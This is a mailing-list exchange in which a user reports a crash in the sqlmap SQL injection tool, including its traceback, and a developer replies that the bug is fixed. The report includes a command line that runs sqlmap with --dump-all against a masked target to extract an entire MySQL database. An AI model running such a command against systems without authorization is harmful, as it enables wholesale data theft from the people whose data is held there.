Please find it fixed.
Thanks for reporting.

Bernardo


On 13 July 2011 07:29, Christian S. <chr...@li...> wrote:
> [00:45:39] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4264),
> retry your run with the latest development version from the Subversion
> repository. If the exception persists, please send by e-mail to
> sql...@li... the following text and any
> information required to reproduce the bug. The developers will try to
> reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4264)
> Python version: 2.6.6
> Operating system: posix
> Command line: sqlmap.py -u ********************************************
> --dump-all --batch --eta --threads=8
> Technique: ERROR
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "sqlmap.py", line 86, in main
>     start()
>   File "/home/user/sqlmap-dev/lib/controller/controller.py", line 554,
> in start
>     action()
>   File "/home/user/sqlmap-dev/lib/controller/action.py", line 112, in
> action
>     conf.dbmsHandler.dumpAll()
>   File "/home/user/sqlmap-dev/plugins/generic/enumeration.py", line
> 1788, in dumpAll
>     self.dumpTable()
>   File "/home/user/sqlmap-dev/plugins/generic/enumeration.py", line
> 1743, in dumpTable
>     conf.dumper.dbTableValues(kb.data.dumpedTable)
>   File "/home/user/sqlmap-dev/lib/core/dump.py", line 438, in dbTableValues
>     dataToDumpFile(dumpFP, "%s," % safeCSValue(value))
>   File "/home/user/sqlmap-dev/lib/core/common.py", line 2784, in
> safeCSValue
>     if not (retVal[0] == retVal[-1] == '"'):
> IndexError: string index out of range
>
> [*] shutting down at 00:45:39
>
>
> ------------------------------------------------------------------------------
> AppSumo Presents a FREE Video for the SourceForge Community by Eric
> Ries, the creator of the Lean Startup Methodology on "Lean Startup
> Secrets Revealed." This video shows you how to validate your ideas,
> optimize your ideas and identify your business strategy.
> http://p.sf.net/sfu/appsumosfdev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable

[sqlmap-users] sqlmap bug (1.0-dev (r4264))

[Christian S. <chr...@li...>]

[00:45:39] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4264), 
retry your run with the latest development version from the Subversion 
repository. If the exception persists, please send by e-mail to 
sql...@li... the following text and any 
information required to reproduce the bug. The developers will try to 
reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4264)
Python version: 2.6.6
Operating system: posix
Command line: sqlmap.py -u ******************************************** 
--dump-all --batch --eta --threads=8
Technique: ERROR
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
   File "sqlmap.py", line 86, in main
     start()
   File "/home/user/sqlmap-dev/lib/controller/controller.py", line 554, 
in start
     action()
   File "/home/user/sqlmap-dev/lib/controller/action.py", line 112, in 
action
     conf.dbmsHandler.dumpAll()
   File "/home/user/sqlmap-dev/plugins/generic/enumeration.py", line 
1788, in dumpAll
     self.dumpTable()
   File "/home/user/sqlmap-dev/plugins/generic/enumeration.py", line 
1743, in dumpTable
     conf.dumper.dbTableValues(kb.data.dumpedTable)
   File "/home/user/sqlmap-dev/lib/core/dump.py", line 438, in dbTableValues
     dataToDumpFile(dumpFP, "%s," % safeCSValue(value))
   File "/home/user/sqlmap-dev/lib/core/common.py", line 2784, in 
safeCSValue
     if not (retVal[0] == retVal[-1] == '"'):
IndexError: string index out of range

[*] shutting down at 00:45:39